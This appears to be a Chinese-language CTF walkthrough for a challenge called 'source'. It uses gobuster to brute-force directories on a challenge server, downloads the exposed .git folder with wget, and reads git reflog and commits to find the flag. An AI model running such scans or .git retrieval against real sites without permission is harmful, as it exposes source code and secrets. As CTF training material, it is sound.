题目:source
工具:gobuster
01—安装gobuster
安装教程:https://blog.csdn.net/qq_22597955/article/details/118553139?spm=1001.2014.3001.5501
02—使用gobuster查看
Gobuster是在Kali Linux中安装的一款目录/文件和DNS爆破工具。它是使用Go语言编写的命令行工具,具备优异的执行效率和并发性能。该工具支持对子域名和Web目录进行基于字典的暴力扫描。不同于其他工具,该工具支持同时多扩展名破解,适合采用多种后台技术的网站。实施子域名扫描时,该工具支持泛域名扫描,并允许用户强制继续扫描,以应对泛域名解析带来的影响。
使用教程:https://github.com/OJ/gobuster
gobuster常用两种扫描模式,dir模式和dns模式。
2.1 使用dir模式
a.运行命令
示例:
gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html
构造:
gobuster dir -u http://114.67.246.176:10181/ -w /usr/share/wordlists/dirb/common.txt
b.运行截图
发现git目录。
2.2 下载git文件
a.运行命令
wget -r http://114.67.246.176:10181/.git
b.运行截图
下载git目录下所有文件。
2.3 查看执行的命令日志
a.运行命令
cd 114.67.246.176:10181/.git/logs/
git reflog
git reflog 可以查看所有分支的所有操作记录(包括已经被删除的 commit 记录和 reset 的操作)。
b.运行截图
进入114.67.246.176:10181/.git/logs/目录,查看reflog。
2.4 查看commit
a.运行命令
示例:
$ git show <commit_id>
构造:
git show e0b8e8e
git show 40c6d51
git show <commit_id>命令可查看commit的具体内容。
b.运行截图
依次查看commit,找到flag。